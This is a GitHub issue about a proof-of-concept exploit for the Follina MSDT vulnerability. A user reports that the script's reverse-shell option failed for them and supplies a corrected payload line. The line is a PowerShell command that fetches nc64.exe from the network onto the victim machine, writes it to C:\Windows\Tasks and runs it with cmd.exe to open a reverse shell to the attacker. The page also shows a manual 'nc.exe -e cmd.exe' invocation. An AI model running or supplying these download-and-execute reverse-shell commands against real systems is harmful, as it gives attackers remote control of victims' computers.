You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
According to Readme.md you should be able to get a reverse shell just by running python3 follina.py -r 9001, this didn't work for me and i had to manually download netcat on the victim machine from "https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe" then run nc.exe -e cmd.exe $HOST_IP to successfully get a reverse shell in the attacker box.
Invoke-WebRequest complains about creating an SSL connection.
This can be fixed by changing line 113 in follina.py with: command = f"""[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
The text was updated successfully, but these errors were encountered:
According to
Readme.md
you should be able to get a reverse shell just by runningpython3 follina.py -r 9001
, this didn't work for me and i had to manually download netcat on the victim machine from "https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe" thenrun nc.exe -e cmd.exe $HOST_IP
to successfully get a reverse shell in the attacker box.Invoke-WebRequest complains about creating an SSL connection.
This can be fixed by changing line 113 in follina.py with:
command = f"""[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
The text was updated successfully, but these errors were encountered: